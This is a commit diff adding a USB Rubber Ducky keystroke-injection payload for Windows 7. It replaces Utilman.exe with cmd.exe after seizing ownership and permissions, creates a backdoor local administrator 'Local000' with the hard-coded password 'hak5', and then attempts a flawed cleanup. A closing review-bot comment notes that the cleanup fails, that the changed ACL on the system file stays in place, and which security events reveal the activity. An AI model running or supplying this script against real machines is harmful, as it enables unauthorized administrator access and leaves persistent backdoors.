Created Payload utilman exploit (rdoc)
parent
55d4fc21ba
commit
0f31c4750f
|
@ -0,0 +1,95 @@
|
|||
Author: Xcellerator (props to Jay Kruer's Fork Bomb script for the UAC bypass technique!)
|
||||
Duckencoder: 1.0
|
||||
Target: Windows 7
|
||||
Description: Uses the Utilman.exe Exploit to create a new local administrator account “Local000” with the password “hak5”.
|
||||
REM Author: Xcellerator
|
||||
REM Description: Utilman Exploiter to create a new Admin Account
|
||||
REM The new account will be called "Local000".
|
||||
GUI
|
||||
DELAY 50
|
||||
STRING cmd
|
||||
MENU
|
||||
STRING a
|
||||
ENTER
|
||||
LEFT
|
||||
ENTER
|
||||
DELAY 200
|
||||
STRING takeown /f "%systemroot%\System32\Utilman.exe"
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING cd %systemroot%\System32
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING mkdir util
|
||||
ENTER
|
||||
STRING xcopy cmd.exe util\
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING ren Utilman.exe Utilman.exe.bak
|
||||
ENTER
|
||||
STRING cd util
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING ren cmd.exe Utilman.exe
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING cd ..
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING xcopy util/Utilman.exe \
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING rmdir /s /q util
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING exit
|
||||
ENTER
|
||||
DELAY 50
|
||||
GUI u
|
||||
STRING net user Local000 /add
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING net localgroup administrators Local000 /add
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING exit
|
||||
ENTER
|
||||
DELAY 50
|
||||
GUI r
|
||||
STRING cmd
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING cd "%systemroot%\System32"
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING delete Utilman.exe
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING y
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING ren Utilman.exe.bak Utilman.exe
|
||||
ENTER
|
||||
DELAY 50
|
||||
STRING exit
|
||||
ENTER
|
||||
GUI
|
||||
STRING cmd
|
||||
MENU
|
||||
STRING a
|
||||
ENTER
|
||||
DELAY 50
|
||||
LEFT
|
||||
ENTER
|
||||
DELAY 200
|
||||
STRING net user Local000 *
|
||||
ENTER
|
||||
STRING hak5
|
||||
ENTER
|
||||
STRING hak5
|
||||
ENTER
|
||||
STRING exit
|
||||
ENTER
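Review bot: The cleanup near the end does not reliably return the machine to its original state: `delete` is not a cmd.exe command, so the following `ren Utilman.exe.bak Utilman.exe` would fail if a Utilman.exe is present at that point, and the owner and ACL changed by the earlier `takeown`/`icacls` lines are never reverted. Together with the hard-coded password on the `Local000` administrator, a test host can be left with a swapped accessibility binary, a weakened ACL on a system file and a guessable admin account after the run. I would say so in the header, e.g. `REM After testing: confirm Utilman.exe is the original file with its original owner/ACL, and remove the Local000 account`. The page would also benefit from a short defender note that this activity surfaces as ownership/ACL changes on System32\Utilman.exe and as Security events 4720 (account created) and 4732 (added to a local group).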
|